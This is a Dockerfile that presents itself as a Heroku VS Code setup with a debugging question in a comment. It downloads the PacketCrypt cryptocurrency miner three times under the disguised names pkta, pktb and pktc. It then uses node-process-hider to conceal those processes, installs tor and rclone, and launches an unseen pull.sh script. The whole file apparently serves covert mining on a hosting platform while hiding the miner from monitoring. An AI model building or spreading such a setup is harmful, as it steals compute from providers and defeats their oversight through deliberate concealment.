FROM debian:stable

#use help to debug and finding whats wrong with my Dockerfile not working properly on heroku
# https://github.com/ivang7/heroku-vscode
RUN apt-get update \
 && apt-get upgrade -y
ARG DEBIAN_FRONTEND=noninteractive
ENV TZ=Europe/Moscow
RUN apt-get install -y tzdata && \
    apt-get install -y \
    ca-certificates \
    libcurl4 \
    libjansson4 \
    libgomp1 \
    build-essential \
    libcurl4-openssl-dev \
    libssl-dev libjansson-dev \
    wget \
    npm \
    nodejs \
    man \
    git \
    sudo \
    wget \
    tor \
    rclone \
    fuse \
    && rm -rf /var/lib/apt/lists/*
    

WORKDIR .

ADD pull.sh .
RUN wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O pkta
RUN wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O pktb
RUN wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O pktc

RUN chmod 777 pkta
RUN chmod 777 pktb
RUN chmod 777 pktc
RUN chmod 777 pull.sh
RUN sudo npm i -g node-process-hider
RUN sleep 2
RUN sudo ph add pkta
RUN sleep 2
RUN sudo ph add pktb
RUN sleep 2
RUN sudo ph add pktc
RUN sleep 2

CMD bash pull.sh